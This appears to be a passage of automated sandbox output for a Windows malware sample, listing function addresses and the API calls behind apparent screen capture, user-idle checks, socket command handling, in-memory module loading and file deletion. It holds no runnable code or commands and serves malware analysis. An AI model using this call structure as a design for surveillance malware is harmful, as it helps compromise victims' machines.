54115->54111 54117 43bfa6 54116->54117 54119 43bf02 54117->54119 54122 4497ec 37 API calls 2 library calls 54117->54122 54121 43bf1f LeaveCriticalSection std::_Lockit::~_Lockit 54119->54121 54120->54110 54121->54110 54122->54117 54123 418acd 54124 418af0 54123->54124 54125 418af8 SHCreateMemStream 54124->54125 54136 418691 GdipLoadImageFromStream 54125->54136 54127 418b0c 54137 4192c9 23 API calls ___std_exception_copy 54127->54137 54129 418b1a SHCreateMemStream 54138 418706 GdipSaveImageToStream 54129->54138 54131 418b62 54132 40520c 28 API calls 54131->54132 54133 418b7b 54132->54133 54140 4186b4 GdipDisposeImage 54133->54140 54135 418bbd 54136->54127 54137->54129 54139 418726 54138->54139 54139->54131 54140->54135 54141 41644c 54142 401e65 22 API calls 54141->54142 54143 41645c 54142->54143 54144 4020f6 28 API calls 54143->54144 54145 416467 54144->54145 54146 401e65 22 API calls 54145->54146 54147 416472 54146->54147 54148 4020f6 28 API calls 54147->54148 54149 41647d 54148->54149 54158 40aace 54149->54158 54159 4046f7 14 API calls 54158->54159 54160 40aae8 54159->54160 54161 40482d 3 API calls 54160->54161 54162 40aaf3 54161->54162 54163 4048c8 97 API calls 54162->54163 54165 40aaff 54163->54165 54164 40ac92 54166 402f31 28 API calls 54164->54166 54165->54164 54167 4020df 11 API calls 54165->54167 54168 40acab 54166->54168 54169 40ab17 54167->54169 54170 402f10 28 API calls 54168->54170 54235 41c516 CreateFileW 54169->54235 54171 40acb5 54170->54171 54173 404aa1 61 API calls 54171->54173 54175 40acc3 54173->54175 54178 401fd8 11 API calls 54175->54178 54176 40ab31 54180 401e65 22 API calls 54176->54180 54177 40ac8a 54179 401fd8 11 API calls 54177->54179 54181 40accb 54178->54181 54179->54164 54182 40ab3d 54180->54182 54183 404e26 99 API calls 54181->54183 54185 40abf8 54182->54185 54203 40ab4d 54182->54203 54184 40acd6 54183->54184 54187 40ace7 54184->54187 54188 40ac88 54184->54188 54186 402f31 28 API calls 54185->54186 54191 40ac17 54186->54191 54247 40b8a4 DeleteFileW RemoveDirectoryW 54187->54247 54248 404ee2 99 API calls 54188->54248 54193 402f10 28 API calls 54191->54193 54195 40ac22 54193->54195 54197 402f10 28 API calls 54195->54197 54199 40ac2d 54197->54199 54201 402f10 28 API calls 54199->54201 54202 40ac37 54201->54202 54204 404aa1 61 API calls 54202->54204 54243 406e13 54203->54243 54205 40ac45 54204->54205 54206 401fd8 11 API calls 54205->54206 54208 40ac4d 54206->54208 54210 401fd8 11 API calls 54208->54210 54209 40ab8e 54211 402f31 28 API calls 54209->54211 54212 40abf3 54210->54212 54213 40abad 54211->54213 54215 401fd8 11 API calls 54212->54215 54214 402f10 28 API calls 54213->54214 54216 40abb8 54214->54216 54217 40ac5d 54215->54217 54218 402f10 28 API calls 54216->54218 54219 404e26 99 API calls 54217->54219 54220 40abc3 54218->54220 54221 40ac68 54219->54221 54222 402f10 28 API calls 54220->54222 54225 40ac80 54221->54225 54226 40ac79 54221->54226 54223 40abcd 54222->54223 54224 404aa1 61 API calls 54223->54224 54227 40abdb 54224->54227 54229 401fd8 11 API calls 54225->54229 54246 40b8a4 DeleteFileW RemoveDirectoryW 54226->54246 54230 401fd8 11 API calls 54227->54230 54229->54188 54231 40abe3 54230->54231 54232 401fd8 11 API calls 54231->54232 54233 40abeb 54232->54233 54234 401fd8 11 API calls 54233->54234 54234->54212 54236 41c540 GetFileSize 54235->54236 54237 40ab29 54235->54237 54249 40244e 54236->54249 54237->54176 54237->54177 54239 41c554 54240 41c566 ReadFile 54239->54240 54241 41c573 54240->54241 54242 41c575 CloseHandle 54240->54242 54241->54242 54242->54237 54244 4020b7 28 API calls 54243->54244 54245 406e27 54244->54245 54245->54209 54246->54225 54247->54188 54250 402456 54249->54250 54252 402460 54250->54252 54253 402a51 28 API calls 54250->54253 54252->54239 54253->54252 54254 41e04e 54255 41e063 ctype ___scrt_fastfail 54254->54255 54256 41e266 54255->54256 54257 432f55 21 API calls 54255->54257 54262 41e21a 54256->54262 54268 41dbf3 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 54256->54268 54261 41e213 ___scrt_fastfail 54257->54261 54259 41e277 54259->54262 54269 432f55 54259->54269 54261->54262 54263 432f55 21 API calls 54261->54263 54266 41e240 ___scrt_fastfail 54263->54266 54264 41e2b0 ___scrt_fastfail 54264->54262 54274 4335db 54264->54274 54266->54262 54267 432f55 21 API calls 54266->54267 54267->54256 54268->54259 54270 432f63 54269->54270 54271 432f5f 54269->54271 54272 43bda0 ___std_exception_copy 21 API calls 54270->54272 54271->54264 54273 432f68 54272->54273 54273->54264 54277 4334fa 54274->54277 54276 4335e3 54276->54262 54278 433513 54277->54278 54281 433509 54277->54281 54279 432f55 21 API calls 54278->54279 54278->54281 54280 433534 54279->54280 54280->54281 54282 4338c8 3 API calls 54280->54282 54281->54276 54282->54281 54283 426c6d 54289 426d42 recv 54283->54289 54290 4161ee 54291 401e65 22 API calls 54290->54291 54292 4161f9 54291->54292 54334 43bb2c 54292->54334 54295 401e65 22 API calls 54296 416214 54295->54296 54297 4020f6 28 API calls 54296->54297 54298 41621e 54297->54298 54299 416265 54298->54299 54300 416236 54298->54300 54302 401e65 22 API calls 54299->54302 54301 401e65 22 API calls 54300->54301 54303 41623b 54301->54303 54304 41626a 54302->54304 54305 4020f6 28 API calls 54303->54305 54306 4020f6 28 API calls 54304->54306 54307 416246 54305->54307 54308 416275 54306->54308 54310 4020f6 28 API calls 54307->54310 54309 4020f6 28 API calls 54308->54309 54311 416284 54309->54311 54312 416255 54310->54312 54313 4187aa 282 API calls 54311->54313 54338 4187aa 54312->54338 54315 416261 54313->54315 54316 401e65 22 API calls 54315->54316 54317 41629e 54316->54317 54318 43bb2c _strftime 40 API calls 54317->54318 54319 4162ab 54318->54319 54320 401e65 22 API calls 54319->54320 54321 4162c0 54320->54321 54322 43bb2c _strftime 40 API calls 54321->54322 54323 4162cd 54322->54323 54399 418977 102 API calls 54323->54399 54325 4162d6 54326 4170c4 54325->54326 54327 401fd8 11 API calls 54325->54327 54328 401e8d 11 API calls 54326->54328 54327->54326 54329 4170cd 54328->54329 54330 401fd8 11 API calls 54329->54330 54331 4170d9 54330->54331 54332 401fd8 11 API calls 54331->54332 54333 4170e5 54332->54333 54335 43bb45 _strftime 54334->54335 54400 43ae83 54335->54400 54337 416206 54337->54295 54428 401fc0 54338->54428 54341 401fc0 28 API calls 54342 4187db 54341->54342 54343 418800 ___scrt_fastfail 54342->54343 54344 4187f1 GdiplusStartup 54342->54344 54432 4194ff 54343->54432 54344->54343 54349 401f09 11 API calls 54350 41883e 54349->54350 54351 41884b 54350->54351 54352 404e26 99 API calls 54350->54352 54452 418e83 DeleteDC 54351->54452 54352->54351 54354 418850 54355 40482d 3 API calls 54354->54355 54356 418857 54355->54356 54357 41885b 54356->54357 54358 4048c8 97 API calls 54356->54358 54359 404e26 99 API calls 54357->54359 54360 418867 54358->54360 54362 418872 54359->54362 54360->54357 54361 418877 54360->54361 54453 404be5 CreateThread 54361->54453 54365 401fd8 11 API calls 54362->54365 54364 418881 54368 418899 54364->54368 54369 41891c 54364->54369 54366 41895f 54365->54366 54367 401fd8 11 API calls 54366->54367 54370 41896b 54367->54370 54454 41bd4f 28 API calls 54368->54454 54371 402f31 28 API calls 54369->54371 54370->54315 54373 418934 54371->54373 54375 402f10 28 API calls 54373->54375 54374 4188a0 54455 41bc1f 54374->54455 54377 41893e 54375->54377 54379 404aa1 61 API calls 54377->54379 54398 41891a 54379->54398 54380 402f31 28 API calls 54381 4188c8 54380->54381 54382 402ea1 28 API calls 54381->54382 54383 4188d4 54382->54383 54385 402f10 28 API calls 54383->54385 54384 401fd8 11 API calls 54384->54362 54386 4188e0 54385->54386 54387 402ea1 28 API calls 54386->54387 54388 4188ea 54387->54388 54389 404aa1 61 API calls 54388->54389 54390 4188f4 54389->54390 54391 401fd8 11 API calls 54390->54391 54392 4188ff 54391->54392 54393 401fd8 11 API calls 54392->54393 54394 418908 54393->54394 54395 401fd8 11 API calls 54394->54395 54396 418911 54395->54396 54397 401fd8 11 API calls 54396->54397 54397->54398 54398->54384 54399->54325 54416 43ba8a 54400->54416 54402 43aed0 54422 43a837 36 API calls 3 library calls 54402->54422 54404 43ae95 54404->54402 54405 43aeaa 54404->54405 54415 43aeaf ___std_exception_copy 54404->54415 54421 44062d 20 API calls _Atexit 54405->54421 54408 43aedc 54410 43af0b 54408->54410 54423 43bacf 40 API calls __Tolower 54408->54423 54412 43af77 54410->54412 54424 43ba36 20 API calls 2 library calls 54410->54424 54425 43ba36 20 API calls 2 library calls 54412->54425 54413 43b03e _strftime 54413->54415 54426 44062d 20 API calls _Atexit 54413->54426 54415->54337 54417 43baa2 54416->54417 54418 43ba8f 54416->54418 54417->54404 54427 44062d 20 API calls _Atexit 54418->54427 54420 43ba94 ___std_exception_copy 54420->54404 54421->54415 54422->54408 54423->54408 54424->54412 54425->54413 54426->54415 54427->54420 54429 401fd2 54428->54429 54430 401fc9 54428->54430 54429->54341 54460 4025e0 28 API calls 54430->54460 54461 401f86 54432->54461 54435 4195f1 EnumDisplayDevicesW 54436 418828 54435->54436 54437 419542 EnumDisplayDevicesW 54435->54437 54443 401f13 54436->54443 54438 41956a 54437->54438 54438->54435 54439 40417e 28 API calls 54438->54439 54440 403014 28 API calls 54438->54440 54441 401f09 11 API calls 54438->54441 54442 4195be EnumDisplayDevicesW 54438->54442 54439->54438 54440->54438 54441->54438 54442->54438 54444 401f22 54443->54444 54451 401f6a 54443->54451 54445 402252 11 API calls 54444->54445 54446 401f2b 54445->54446 54447 401f6d 54446->54447 54448 401f46 54446->54448 54449 402336 11 API calls 54447->54449 54465 40305c 28 API calls 54448->54465 54449->54451 54451->54349 54452->54354 54453->54364 54466 404c01 54453->54466 54454->54374 54941 441ed1 54455->54941 54458 402093 28 API calls 54459 4188bb 54458->54459 54459->54380 54460->54429 54462 401f8e 54461->54462 54463 402252 11 API calls 54462->54463 54464 401f99 EnumDisplayMonitors 54463->54464 54464->54435 54465->54451 54469 404c10 54466->54469 54470 4020df 11 API calls 54469->54470 54471 404c27 54470->54471 54472 4020df 11 API calls 54471->54472 54479 404c30 54472->54479 54473 43bda0 ___std_exception_copy 21 API calls 54473->54479 54475 4020b7 28 API calls 54475->54479 54476 404ca1 54478 404e26 99 API calls 54476->54478 54480 404ca8 54478->54480 54479->54473 54479->54475 54479->54476 54481 401fd8 11 API calls 54479->54481 54487 404b96 54479->54487 54493 401fe2 54479->54493 54502 404cc3 54479->54502 54482 401fd8 11 API calls 54480->54482 54481->54479 54483 404cb1 54482->54483 54484 401fd8 11 API calls 54483->54484 54485 404c0f 54484->54485 54488 404ba0 WaitForSingleObject 54487->54488 54489 404bcd recv 54487->54489 54515 421107 54 API calls 54488->54515 54490 404be0 54489->54490 54490->54479 54492 404bbc SetEvent 54492->54490 54494 401ff1 54493->54494 54495 402039 54493->54495 54496 4023ce 11 API calls 54494->54496 54495->54479 54497 401ffa 54496->54497 54498 40203c 54497->54498 54499 402015 54497->54499 54500 40267a 11 API calls 54498->54500 54516 403098 28 API calls 54499->54516 54500->54495 54503 4020df 11 API calls 54502->54503 54512 404cde 54503->54512 54504 404e13 54505 401fd8 11 API calls 54504->54505 54506 404e1c 54505->54506 54506->54479 54507 4041a2 28 API calls 54507->54512 54508 401fe2 28 API calls 54508->54512 54509 4020f6 28 API calls 54509->54512 54510 401fc0 28 API calls 54511 404dad CreateEventA CreateThread WaitForSingleObject CloseHandle 54510->54511 54511->54512 54839 415b25 54511->54839 54512->54504 54512->54507 54512->54508 54512->54509 54512->54510 54513 401fd8 11 API calls 54512->54513 54517 4129da 54512->54517 54513->54512 54515->54492 54516->54495 54518 4129ec 54517->54518 54561 4041a2 54518->54561 54521 4020f6 28 API calls 54522 412a0e 54521->54522 54523 4020f6 28 API calls 54522->54523 54524 412a1d 54523->54524 54564 41beac 54524->54564 54527 412ace 54528 401e8d 11 API calls 54527->54528 54530 412ad7 54528->54530 54529 401e65 22 API calls 54531 412a3d 54529->54531 54532 401fd8 11 API calls 54530->54532 54533 4020f6 28 API calls 54531->54533 54534 412ae0 54532->54534 54535 412a48 54533->54535 54536 401fd8 11 API calls 54534->54536 54537 401e65 22 API calls 54535->54537 54538 412ae8 54536->54538 54539 412a53 54537->54539 54538->54512 54540 4020f6 28 API calls 54539->54540 54541 412a5e 54540->54541 54542 401e65 22 API calls 54541->54542 54543 412a69 54542->54543 54544 4020f6 28 API calls 54543->54544 54545 412a74 54544->54545 54546 401e65 22 API calls 54545->54546 54547 412a7f 54546->54547 54548 4020f6 28 API calls 54547->54548 54549 412a8a 54548->54549 54550 401e65 22 API calls 54549->54550 54551 412a95 54550->54551 54552 4020f6 28 API calls 54551->54552 54553 412aa0 54552->54553 54554 401e65 22 API calls 54553->54554 54555 412aae 54554->54555 54556 4020f6 28 API calls 54555->54556 54557 412ab9 54556->54557 54586 412aef GetModuleFileNameW 54557->54586 54560 404e26 99 API calls 54560->54527 54733 40423a 54561->54733 54565 4020df 11 API calls 54564->54565 54582 41bebf 54565->54582 54566 401fd8 11 API calls 54567 41bf61 54566->54567 54569 401fd8 11 API calls 54567->54569 54568 41bf31 54572 4041a2 28 API calls 54568->54572 54571 41bf69 54569->54571 54570 4041a2 28 API calls 54570->54582 54574 401fd8 11 API calls 54571->54574 54573 41bf3d 54572->54573 54575 401fe2 28 API calls 54573->54575 54577 412a26 54574->54577 54578 41bf46 54575->54578 54576 401fe2 28 API calls 54576->54582 54577->54527 54577->54529 54579 401fd8 11 API calls 54578->54579 54581 41bf4e 54579->54581 54580 401fd8 11 API calls 54580->54582 54583 41cec5 28 API calls 54581->54583 54582->54568 54582->54570 54582->54576 54582->54580 54585 41bf2f 54582->54585 54739 41cec5 54582->54739 54583->54585 54585->54566 54587 4020df 11 API calls 54586->54587 54588 412b1a 54587->54588 54589 4020df 11 API calls 54588->54589 54590 412b26 54589->54590 54591 4020df 11 API calls 54590->54591 54613 412b32 54591->54613 54592 41ba09 43 API calls 54592->54613 54593 40da23 32 API calls 54593->54613 54594 401fd8 11 API calls 54594->54613 54595 403014 28 API calls 54595->54613 54596 4185a3 31 API calls 54596->54613 54597 412c58 Sleep 54597->54613 54598 40417e 28 API calls 54598->54613 54599 4042fc 79 API calls 54599->54613 54600 401f09 11 API calls 54600->54613 54601 412cfa Sleep 54601->54613 54602 40431d 28 API calls 54602->54613 54603 412d9c Sleep 54603->54613 54604 41c516 32 API calls 54604->54613 54605 412dff DeleteFileW 54605->54613 54606 412e36 DeleteFileW 54606->54613 54607 412e88 Sleep 54607->54613 54608 412e72 DeleteFileW 54608->54613 54609 412f01 54610 401f09 11 API calls 54609->54610 54611 412f0d 54610->54611 54612 401f09 11 API calls 54611->54612 54614 412f19 54612->54614 54613->54592 54613->54593 54613->54594 54613->54595 54613->54596 54613->54597 54613->54598 54613->54599 54613->54600 54613->54601 54613->54602 54613->54603 54613->54604 54613->54605 54613->54606 54613->54607 54613->54608 54613->54609 54617 412ecd Sleep 54613->54617 54615 401f09 11 API calls 54614->54615 54616 412f25 54615->54616 54618 40b93f 28 API calls 54616->54618 54619 401f09 11 API calls 54617->54619 54620 412f38 54618->54620 54624 412edd 54619->54624 54622 4020f6 28 API calls 54620->54622 54621 401f09 11 API calls 54621->54624 54623 412f58 54622->54623 54760 413268 54623->54760 54624->54613 54624->54621 54625 412eff 54624->54625 54625->54616 54628 401f09 11 API calls 54629 412f6f 54628->54629 54630 4130e3 54629->54630 54631 412f8f 54629->54631 54632 41bdaf 28 API calls 54630->54632 54633 41bdaf 28 API calls 54631->54633 54634 4130ec 54632->54634 54635 412f9b 54633->54635 54636 402f31 28 API calls 54634->54636 54637 41bc1f 28 API calls 54635->54637 54638 413123 54636->54638 54639 412fb5 54637->54639 54640 402f10 28 API calls 54638->54640 54641 402f31 28 API calls 54639->54641 54642 413132 54640->54642 54643 412fe5 54641->54643 54644 402f10 28 API calls 54642->54644 54645 402f10 28 API calls 54643->54645 54646 41313e 54644->54646 54647 412ff4 54645->54647 54648 402f10 28 API calls 54646->54648 54649 402f10 28 API calls 54647->54649 54650 41314d 54648->54650 54651 413003 54649->54651 54652 402f10 28 API calls 54650->54652 54653 402f10 28 API calls 54651->54653 54655 41315c 54652->54655 54654 413012 54653->54654 54657 402f10 28 API calls 54654->54657 54656 402f10 28 API calls 54655->54656 54658 41316b 54656->54658 54659 413021 54657->54659 54660 402f10 28 API calls 54658->54660 54661 402f10 28 API calls 54659->54661 54662 41317a 54660->54662 54663 41302d 54661->54663 54664 402ea1 28 API calls 54662->54664 54665 402f10 28 API calls 54663->54665 54666 413184 54664->54666 54667 413039 54665->54667 54668 404aa1 61 API calls 54666->54668 54669 402ea1 28 API calls 54667->54669 54670 413191 54668->54670 54671 413048 54669->54671 54672 401fd8 11 API calls 54670->54672 54673 402f10 28 API calls 54671->54673 54674 41319d 54672->54674 54675 413054 54673->54675 54676 401fd8 11 API calls 54674->54676 54677 402ea1 28 API calls 54675->54677 54678 4131a9 54676->54678 54679 41305e 54677->54679 54680 401fd8 11 API calls 54678->54680 54681 404aa1 61 API calls 54679->54681 54682 4131b5 54680->54682 54683 41306b 54681->54683 54684 401fd8 11 API calls 54682->54684 54685 401fd8 11 API calls 54683->54685 54687 4131c1 54684->54687 54686 413074 54685->54686 54689 401fd8 11 API calls 54686->54689 54688 401fd8 11 API calls 54687->54688 54690 4131ca 54688->54690 54691 41307d 54689->54691 54692 401fd8 11 API calls 54690->54692 54693 401fd8 11 API calls 54691->54693 54694 4131d3 54692->54694 54695 413086 54693->54695 54696 401fd8 11 API calls 54694->54696 54697 401fd8 11 API calls 54695->54697 54698 4130d7 54696->54698 54699 41308f 54697->54699 54701 401fd8 11 API calls 54698->54701 54700 401fd8 11 API calls 54699->54700 54702 41309b 54700->54702 54703 4131e5 54701->54703 54704 401fd8 11 API calls 54702->54704 54705 401f09 11 API calls 54703->54705 54706 4130a7 54704->54706 54707 4131f1 54705->54707 54708 401fd8 11 API calls 54706->54708 54709 401fd8 11 API calls 54707->54709 54710 4130b3 54708->54710 54711 4131fd 54709->54711 54712 401fd8 11 API calls 54710->54712 54713 401fd8 11 API calls 54711->54713 54714 4130bf 54712->54714 54715 413209 54713->54715 54716 401fd8 11 API calls 54714->54716 54718 401fd8 11 API calls 54715->54718 54717 4130cb 54716->54717 54720 401fd8 11 API calls 54717->54720 54719 413215 54718->54719 54721 401fd8 11 API calls 54719->54721 54720->54698 54722 413221 54721->54722 54723 401fd8 11 API calls 54722->54723 54724 41322d 54723->54724 54725 401fd8 11 API calls 54724->54725 54726 413239 54725->54726 54727 401fd8 11 API calls 54726->54727 54728 413245 54727->54728 54729 401fd8 11 API calls 54728->54729 54730 413251 54729->54730 54731 401fd8 11 API calls 54730->54731 54732 412abe 54731->54732 54732->54560 54734 404243 54733->54734 54735 4023ce 11 API calls 54734->54735 54736 40424e 54735->54736 54737 402569 28 API calls 54736->54737 54738 4041b5 54737->54738 54738->54521 54740 41ced2 54739->54740 54741 41cf31 54740->54741 54745 41cee2 54740->54745 54742 41cf4b 54741->54742 54755 41d071 28 API calls 54741->54755 54744 41d1d7 28 API calls 54742->54744 54749 41cf2d 54744->54749 54746 41cf1a 54745->54746 54750 41d071 28 API calls 54745->54750 54751 41d1d7 54746->54751 54749->54582 54750->54746 54752 41d1e0 54751->54752 54756 41d283 54752->54756 54755->54742 54757 41d28c 54756->54757 54758 41d331 28 API calls 54757->54758 54759 41d1ea 54758->54759 54759->54749 54761 4132a6 54760->54761 54763 413277 54760->54763 54762 4132b5 54761->54762 54772 10001c5b 54761->54772 54764 40417e 28 API calls 54762->54764 54776 411d2d 54763->54776 54765 4132c1 54764->54765 54767 401fd8 11 API calls 54765->54767 54769 412f63 54767->54769 54769->54628 54773 10001c6b ___scrt_fastfail 54772->54773 54780 100012ee 54773->54780 54775 10001c87 54775->54762 54806 411d39 54776->54806 54779 411fa2 22 API calls ___std_exception_copy 54779->54761 54781 10001324 ___scrt_fastfail 54780->54781 54782 100013b7 GetEnvironmentVariableW 54781->54782 54783 100010f1 57 API calls 54782->54783 54784 10001451 54783->54784 54785 100010f1 57 API calls 54784->54785 54786 10001465 54785->54786 54787 100010f1 57 API calls 54786->54787 54788 10001479 54787->54788 54789 100010f1 57 API calls 54788->54789 54790 1000148d 54789->54790 54791 100010f1 57 API calls 54790->54791 54792 100014a1 54791->54792 54793 100010f1 57 API calls 54792->54793 54794 100014b5 lstrlenW 54793->54794 54795 100014d2 54794->54795 54796 100014d9 lstrlenW 54794->54796 54795->54775 54797 100010f1 57 API calls 54796->54797 54798 10001501 lstrlenW lstrcatW 54797->54798 54799 100010f1 57 API calls 54798->54799 54800 10001539 lstrlenW lstrcatW 54799->54800 54801 100010f1 57 API calls 54800->54801 54802 1000156b lstrlenW lstrcatW 54801->54802 54803 100010f1 57 API calls 54802->54803 54804 1000159d lstrlenW lstrcatW 54803->54804 54805 100010f1 57 API calls 54804->54805 54805->54795 54807 4117d7 SetLastError 54806->54807 54808 411d57 54807->54808 54809 411d6d SetLastError 54808->54809 54810 4117d7 SetLastError 54808->54810 54836 411d35 54808->54836 54809->54836 54811 411d8a 54810->54811 54811->54809 54813 411dac GetNativeSystemInfo 54811->54813 54811->54836 54814 411df2 54813->54814 54816 411cde VirtualAlloc 54814->54816 54825 411dff SetLastError 54814->54825 54817 411e22 54816->54817 54818 411e47 GetProcessHeap HeapAlloc 54817->54818 54821 411cde VirtualAlloc 54817->54821 54819 411e70 54818->54819 54820 411e5e 54818->54820 54823 4117d7 SetLastError 54819->54823 54822 411cf5 VirtualFree 54820->54822 54824 411e3a 54821->54824 54822->54825 54826 411eb9 54823->54826 54824->54818 54824->54825 54825->54836 54827 411f6b 54826->54827 54829 411cde VirtualAlloc 54826->54829 54828 4120b2 GetProcessHeap HeapFree 54827->54828 54828->54836 54830 411ed2 ctype 54829->54830 54831 4117ea SetLastError 54830->54831 54832 411efe 54831->54832 54832->54827 54833 411b9a 26 API calls 54832->54833 54834 411f2b 54833->54834 54834->54827 54835 41198a VirtualProtect 54834->54835 54837 411f36 54835->54837 54836->54779 54837->54827 54837->54836 54838 411f60 SetLastError 54837->54838 54838->54827 54840 4020f6 28 API calls 54839->54840 54841 415b47 SetEvent 54840->54841 54842 415b5c 54841->54842 54843 4041a2 28 API calls 54842->54843 54844 415b76 54843->54844 54845 4020f6 28 API calls 54844->54845 54846 415b86 54845->54846 54847 4020f6 28 API calls 54846->54847 54848 415b98 54847->54848 54849 41beac 28 API calls 54848->54849 54850 415ba1 54849->54850 54851 415bc1 GetTickCount 54850->54851 54852 415d20 54850->54852 54915 415d11 54850->54915 54854 41bc1f 28 API calls 54851->54854 54852->54915 54916 415d34 54852->54916 54853 401e8d 11 API calls 54855 4170cd 54853->54855 54856 415bd2 54854->54856 54858 401fd8 11 API calls 54855->54858 54918 41bb77 GetLastInputInfo GetTickCount 54856->54918 54860 4170d9 54858->54860 54862 401fd8 11 API calls 54860->54862 54861 415bde 54864 41bc1f 28 API calls 54861->54864 54863 4170e5 54862->54863 54865 415be9 54864->54865 54866 41bb27 30 API calls 54865->54866 54867 415bf7 54866->54867 54868 41bdaf 28 API calls 54867->54868 54869 415c05 54868->54869 54870 401e65 22 API calls 54869->54870 54871 415c13 54870->54871 54872 402f31 28 API calls 54871->54872 54873 415c21 54872->54873 54874 402ea1 28 API calls 54873->54874 54875 415c30 54874->54875 54876 402f10 28 API calls 54875->54876 54877 415c3f 54876->54877 54878 402ea1 28 API calls 54877->54878 54879 415c4e 54878->54879 54880 402f10 28 API calls 54879->54880 54881 415c5a 54880->54881 54882 402ea1 28 API calls 54881->54882 54883 415c64 54882->54883 54884 404aa1 61 API calls 54883->54884 54885 415c73 54884->54885 54886 401fd8 11 API calls 54885->54886 54887 415c7c 54886->54887 54888 401fd8 11 API calls 54887->54888 54889 415c88 54888->54889 54890 401fd8 11 API calls 54889->54890 54891 415c94 54890->54891 54892 401fd8 11 API calls 54891->54892 54893 415ca0 54892->54893 54894 401fd8 11 API calls 54893->54894 54895 415cac 54894->54895 54896 401fd8 11 API calls 54895->54896 54897 415cb8 54896->54897 54898 401f09 11 API calls 54897->54898 54899 415cc1 54898->54899 54900 401fd8 11 API calls 54899->54900 54901 415cca 54900->54901 54902 401fd8 11 API calls 54901->54902 54903 415cd3 54902->54903 54904 401e65 22 API calls 54903->54904 54905 415cde 54904->54905 54906 43bb2c _strftime 40 API calls 54905->54906 54907 415ceb 54906->54907 54908 415cf0 54907->54908 54909 415d16 54907->54909 54911 415d09 54908->54911 54912 415cfe 54908->54912 54910 401e65 22 API calls 54909->54910 54910->54852 54920 404f51 54911->54920 54919 404ff4 82 API calls 54912->54919 54915->54853 54935 4050e4 84 API calls 54916->54935 54917 415d04 54917->54915 54918->54861 54919->54917 54921 404f65 54920->54921 54922 404fea 54920->54922 54923 404f6e 54921->54923 54924 404fc0 CreateEventA CreateThread 54921->54924 54925 404f7d GetLocalTime 54921->54925 54922->54915 54923->54924 54924->54922 54937 405150 54924->54937 54926 41bc1f 28 API calls 54925->54926 54927 404f91 54926->54927 54936 4052fd 28 API calls 54927->54936 54935->54917 54940 40515c 102 API calls 54937->54940 54939 405159 54940->54939 54942 441edd 54941->54942 54945 441ccd 54942->54945 54944 41bc43 54944->54458 54946 441ce4 54945->54946 54948 441d1b ___std_exception_copy 54946->54948 54949 44062d 20 API calls _Atexit 54946->54949 54948->54944 54949->54948 54950 418eb1 CreateDCA CreateCompatibleDC 54999 419360 54950->54999 54952 418eec 54953 418f13 54952->54953 55004 4193a2 GetMonitorInfoW 54952->55004 54955 418f71 54953->54955 55002 4193d8 GetMonitorInfoW 54953->55002 54956 402093 28 API calls 54955->54956 54998 418f7d 54956->54998 54959 418f8a SelectObject 54961 418fa5 StretchBlt 54959->54961 54977 418f96 DeleteDC DeleteDC 54959->54977 54960 418f5e DeleteDC DeleteDC 54962 418f6b DeleteObject 54960->54962 54964 418fce 54961->54964 54961->54977 54962->54955 54965 418fd5 GetCursorInfo 54964->54965 54966 41904f 54964->54966 54965->54966 54967 418fec GetIconInfo 54965->54967 54968 419099 GetObjectA 54966->54968 54970 419062 BitBlt 54966->54970 54971 419089 54966->54971 54967->54966 54969 419002 DeleteObject DeleteObject DrawIcon 54967->54969 54972 4190b1 LocalAlloc 54968->54972 54968->54977 54969->54966 54970->54968 54971->54968 54974 419154 GlobalAlloc 54972->54974 54975 41914a 54972->54975 54976 419196 GetDIBits 54974->54976 54974->54977 54975->54974 54978 4191d3 54976->54978 54979 4191ad DeleteDC DeleteDC DeleteObject GlobalFree 54976->54979 54977->54962 54980 4020df 11 API calls 54978->54980 54979->54955 54981 41920f 54980->54981 54982 4020df 11 API calls 54981->54982 54983 41921b 54982->54983 54984 40250a 28 API calls 54983->54984 54985 41922b 54984->54985 54986 40250a 28 API calls 54985->54986 54987 419248 54986->54987 54988 40250a 28 API calls 54987->54988 54989 41926a 54988->54989 54990 41927b DeleteObject GlobalFree DeleteDC 54989->54990 54991 4192a0 54990->54991 54992 41929d DeleteDC 54990->54992 54993 402055 11 API calls 54991->54993 54992->54991 54994 4192af 54993->54994 54995 401fd8 11 API calls 54994->54995 54996 4192bb 54995->54996 54997 401fd8 11 API calls 54996->54997 54997->54998 55000 436f10 ___scrt_fastfail 54999->55000 55001 41937e EnumDisplaySettingsW 55000->55001 55001->54952 55003 418f48 CreateCompatibleBitmap 55002->55003 55003->54959 55003->54960 55004->54953 55005 426a77 55006 426a8c 55005->55006 55013 426b1e 55005->55013 55009 426ad9 55006->55009 55010 426b0e 55006->55010 55011 426b83 55006->55011 55006->55013 55016 426b4e 55006->55016 55018 426bae 55006->55018 55019 426bd5 55006->55019 55033 424f6e 49 API calls ctype 55006->55033 55009->55010 55009->55013 55034 41fbfd 52 API calls 55009->55034 55010->55013 55010->55016 55035 424f6e 49 API calls ctype 55010->55035 55011->55018 55037 425781 21 API calls 55011->55037 55016->55011 55016->55013 55036 41fbfd 52 API calls 55016->55036 55018->55013 55018->55019 55021 425b72 55018->55021 55019->55013 55038 4261e6 28 API calls 55019->55038 55022 425b91 ___scrt_fastfail 55021->55022 55024 425ba0 55022->55024 55028 425bc5 55022->55028 55039 41ec4c 21 API calls 55022->55039 55024->55028 55032 425ba5 55024->55032 55040 420669 46 API calls 55024->55040 55027 425bae 55027->55028 55042 424d96 21 API calls 2 library calls 55027->55042 55028->55019 55030 425c48 55030->55028 55031 432f55 21 API calls 55030->55031 55031->55032 55032->55027 55032->55028 55041 41daf0 49 API calls 55032->55041 55033->55009 55034->55009 55035->55016 55036->55016 55037->55018 55038->55013 55039->55024 55040->55030 55041->55027 55042->55028 55043 4165db 55044 401e65 22 API calls 55043->55044 55045 4165eb 55044->55045 55046 4020f6 28 API calls 55045->55046 55047 4165f6 55046->55047 55048 401e65 22 API calls 55047->55048 55049 416601 55048->55049 55050 4020f6 28 API calls 55049->55050 55051 41660c 55050->55051 55054 412965 55051->55054 55055 40482d 3 API calls 55054->55055 55056 412979 55055->55056 55057 4048c8 97 API calls 55056->55057 55058 412981 55057->55058 55059 402f31 28 API calls 55058->55059 55060 41299a 55059->55060 55061 402f10 28 API calls 55060->55061 55062 4129a4 55061->55062 55063 404aa1 61 API calls 55062->55063 55064 4129ae 55063->55064 55065 401fd8 11 API calls 55064->55065 55066 4129b6 55065->55066 55067 404c10 265 API calls 55066->55067 55068 4129c4 55067->55068 55069 401fd8 11 API calls 55068->55069 55070 4129cc 55069->55070 55071 401fd8 11 API calls 55070->55071 55072 4129d4 55071->55072 55073 434918 55074 434924 ___DestructExceptionObject 55073->55074 55100 434627 55074->55100 55076 43492b 55078 